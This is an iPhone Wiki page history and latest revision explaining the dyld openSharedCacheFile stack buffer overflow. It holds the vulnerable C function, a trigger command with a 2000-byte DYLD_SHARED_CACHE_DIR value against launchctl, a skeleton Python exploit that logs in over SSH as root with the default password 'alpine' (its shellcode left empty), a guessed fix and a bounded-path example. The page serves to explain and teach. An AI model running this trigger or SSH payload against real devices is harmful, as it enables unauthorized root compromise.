Difference between revisions of "OpenSharedCacheFile"

From The iPhone Wiki
(Created page with "The OpenSharedCacheFile bug was found by i0n1c, what this bug is just a simple stack overflow == Opensharedcachefile() function == int openSharedCacheFile() { char path[1024]...")
 
m (Apple's fix: Add a space)
 
(11 intermediate revisions by 4 users not shown)
Line 1: Line 1:
The OpenSharedCacheFile bug was found by i0n1c, what this bug is just a simple stack overflow
+
The OpenSharedCacheFile bug was found by [[i0n1c]]. This bug is a simple stack overflow.
 
== Opensharedcachefile() function ==
 
== Opensharedcachefile() function ==
int openSharedCacheFile()
+
int openSharedCacheFile()
{
+
{
char path[1024];
+
char path[1024];
strcpy(path, sSharedCacheDir);
+
strcpy(path, sSharedCacheDir);
strcat(path, "/");
+
strcat(path, "/");
strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME);
+
strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME);
return ::open(path, O_RDONLY);
+
return ::open(path, O_RDONLY);
}
+
}
   
== Triggering the vuln ===
+
== Triggering the vuln ==
   
 
To trigger it, run the following
 
To trigger it, run the following
DYLD_SHARED_CACHE_DIR = “A” * 2000 \
+
DYLD_SHARED_CACHE_DIR = "A" * 2000 \
DYLD_SHARED_REGION = private /bin/launchctl
+
DYLD_SHARED_REGION = private /bin/launchctl
 
This will overflow the PC register making it a stack overflow.
 
This will overflow the PC register making it a stack overflow.
  +
  +
== Exploiting it ==
  +
  +
Since this bug can takeover the PC register, you first need to know where the bug starts
  +
for now lets say it crashes after 1024 A's, so your payload to get root would be
  +
junk = "A" * 1024
  +
shellcode = ""
  +
payload = "DYLD_SHARED_CACHE_DIR"
  +
actual = payload+junk+shellcode \
  +
cmd = "DYLD_SHARED_REGION = "private /bin/launchctl"
  +
ssh = paramiko.SSHClient()
  +
server = "" #whatever IP
  +
ssh.connect(server, username="root", password="alpine")
  +
ssh.exec_command(actual)
  +
ssh.exec_command(cmd)
  +
  +
== Apple's fix ==
  +
  +
I'm guessing they added an if-statement to check for the size sSharedCacheDir
  +
so like this.
  +
  +
extern void _ZN4dyld4haltEPKc(const char* msg) __attribute__((noreturn));
  +
void __stack_chk_fail()
  +
{
  +
_ZN4dyld4haltEPKc("stack buffer overrun");
  +
}
  +
  +
if(sizeof(sSharedCacheDir >= 1024){
  +
__stack_chk_fail();
  +
}
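Review bot: the added Apple's fix lines `if(sizeof(sSharedCacheDir >= 1024){` / `__stack_chk_fail();` / `}` do not compile and would not test the string length: the closing parenthesis belongs right after `sSharedCacheDir`, and `sizeof` applied to a pointer gives the pointer size rather than the length of the directory string, so the guessed check needs `strlen(sSharedCacheDir)`. In the added Exploiting it lines, `cmd = "DYLD_SHARED_REGION = "private /bin/launchctl"` has unbalanced quotes and `actual = payload+junk+shellcode \` ends in a stray backslash, so the Python as added will not parse.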

Latest revision as of 04:51, 5 March 2021

The OpenSharedCacheFile bug was found by i0n1c. This bug is a simple stack buffer overflow: the caller-supplied DYLD_SHARED_CACHE_DIR value is copied into a fixed-size stack buffer without any length check.

Opensharedcachefile() function

int openSharedCacheFile()
{
  char path[1024];                    // fixed-size buffer on the stack
  strcpy(path, sSharedCacheDir);      // DYLD_SHARED_CACHE_DIR, copied with no length check
  strcat(path, "/");                  // appended, still unchecked
  strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME);  // appended, still unchecked
  return ::open(path, O_RDONLY);
}

Triggering the vuln

To trigger it, run the following:

# "A" * 2000 in the page's notation, i.e. a 2000-byte directory name
DYLD_SHARED_CACHE_DIR="$(printf 'A%.0s' $(seq 1 2000))" \
DYLD_SHARED_REGION=private /bin/launchctl

The oversized directory name overruns the 1024-byte path buffer and overwrites the saved return address on the stack, so the PC register is controlled when openSharedCacheFile() returns; that is what makes this a stack overflow rather than a plain crash.

Exploiting it

Since this bug takes over the PC register, you first need to know at which offset the overwrite starts. For now, let's say it crashes after 1024 A's, so your payload to get root would be:

 import paramiko

 junk = "A" * 1024          # padding up to the point where the overwrite starts
 shellcode = ""             # left empty on the page; nothing is filled in here
 payload = "DYLD_SHARED_CACHE_DIR="
 actual = payload + junk + shellcode
 # both variables must be set for the same process, so they go in one command
 cmd = actual + " DYLD_SHARED_REGION=private /bin/launchctl"
 ssh = paramiko.SSHClient()
 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())  # accept the device's host key
 server = ""  # whatever IP
 ssh.connect(server, username="root", password="alpine")
 ssh.exec_command(cmd)

Apple's fix

I'm guessing they added an if-statement to check the size of sSharedCacheDir, so like this:

 #include <string.h>
 extern void _ZN4dyld4haltEPKc(const char* msg) __attribute__((noreturn));
 void __stack_chk_fail()
 {
     _ZN4dyld4haltEPKc("stack buffer overrun");
 }
 /* inside openSharedCacheFile(), before the strcpy(): check the directory length;
    sizeof(sSharedCacheDir) would give the pointer size, not the string length */
 if (strlen(sSharedCacheDir) >= 1024) {
     __stack_chk_fail();
 }
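The following is an added example written for this page; it is not dyld's code and not the fix the page guesses at. It shows, for the path construction that openSharedCacheFile() performs and for the guessed length check in the section above, how the same string can be built without ever writing past the 1024-byte buffer, and how many bytes the unchecked strcpy()/strcat() sequence would have written for a given directory name. The function names (build_cache_path, cache_path_for, try_dir_of_length, unchecked_write_size), the "dyld_shared_cache_" base name, the "armv7" suffix and the sample directory strings are assumptions for the demo.

```c
/* Added example for this page (not dyld's code): bounded construction of
 * "<dir>/<base><arch>" and a measurement of what the unchecked version
 * would have written. All names and sample values below are assumptions. */
#include <stdio.h>
#include <string.h>

#define PATH_MAX_LEN 1024                          /* same size as the page's path[1024] */
#define DYLD_SHARED_CACHE_BASE_NAME "dyld_shared_cache_" /* assumption */
#define ARCH_NAME "armv7"                          /* assumption: one plausible suffix */

/* Build the path into out (capacity out_len) without writing past the buffer.
 * Returns 0 on success, -1 if the full string would not fit. snprintf()
 * reports the length the whole string would have had, which is the check the
 * original strcpy()/strcat() sequence never performed. */
int build_cache_path(const char *dir, char *out, size_t out_len)
{
    int needed = snprintf(out, out_len, "%s/%s%s", dir,
                          DYLD_SHARED_CACHE_BASE_NAME, ARCH_NAME);
    if (needed < 0 || (size_t)needed >= out_len) {
        out[0] = '\0';          /* truncated: refuse rather than open a wrong path */
        return -1;
    }
    return 0;
}

/* Convenience wrapper: the built path in a static buffer, or "" on failure. */
const char *cache_path_for(const char *dir)
{
    static char path[PATH_MAX_LEN];
    return build_cache_path(dir, path, sizeof path) == 0 ? path : "";
}

/* Bytes the unchecked code would write into its 1024-byte buffer for this
 * directory, NUL terminator included. Anything above PATH_MAX_LEN overruns. */
size_t unchecked_write_size(const char *dir)
{
    return strlen(dir) + 1 + strlen(DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME) + 1;
}

/* Demo helper: try a constructed directory name of n 'A' bytes, like the
 * "A" * 2000 on the page. Returns build_cache_path()'s result. */
int try_dir_of_length(size_t n)
{
    char dir[4096];
    char path[PATH_MAX_LEN];
    if (n >= sizeof dir)
        return -2;
    memset(dir, 'A', n);
    dir[n] = '\0';
    return build_cache_path(dir, path, sizeof path);
}

int main(void)
{
    char big[2001];                     /* constructed: 2000 'A's, as on the page */
    memset(big, 'A', 2000);
    big[2000] = '\0';

    printf("normal dir : %s\n", cache_path_for("/System/Library/Caches/com.apple.dyld"));
    printf("2000-byte dir: rc=%d, unchecked code would write %zu bytes into %d\n",
           try_dir_of_length(2000), unchecked_write_size(big), PATH_MAX_LEN);
    /* the boundary: 999 'A's still fit, 1000 no longer do once "/" and the
       base name are appended, which a check on the directory alone misses */
    printf("999 -> rc=%d, 1000 -> rc=%d\n", try_dir_of_length(999), try_dir_of_length(1000));
    return 0;
}
```

Build with `cc -std=c99 -Wall example.c`. The boundary printed at the end is the point of the example: a check on the directory string alone, such as the `>= 1024` guess above, still lets a directory of 1000 to 1023 bytes overrun the buffer once the separator and base name are appended, whereas measuring the assembled result covers every case.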